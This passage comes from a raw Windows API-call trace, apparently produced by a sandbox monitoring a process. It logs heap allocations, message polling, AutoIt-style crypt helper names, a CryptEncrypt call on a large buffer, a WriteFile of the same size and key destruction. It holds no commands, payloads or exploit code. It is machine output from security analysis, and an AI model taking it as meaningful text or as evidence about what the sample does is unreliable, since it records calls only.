lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e542d8 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0250.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0250.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0250.741] CryptEncrypt (in: hKey=0xa876d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f38ec8*, pdwDataLen=0x8cef60*=0xc4dc, dwBufLen=0xc4e0 | out: pbData=0x2f38ec8*, pdwDataLen=0x8cef60*=0xc4e0) returned 1 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0250.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0250.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0250.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0250.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0250.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0250.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.746] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.746] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.746] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.746] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.746] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.747] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0250.747] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.747] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.755] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0xc4e0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0xc4e0, lpOverlapped=0x0) returned 1 [0250.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.759] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0250.759] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.795] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0250.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0250.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51760, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0250.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.795] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0250.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0250.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0250.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.796] CryptDestroyKey (hKey=0xa876d0) returned 1 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0250.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.797] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.798] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.798] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0250.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.798] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0250.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.799] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0250.800] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.800] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0250.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.800] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0250.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.800] RtlAllocateHeap 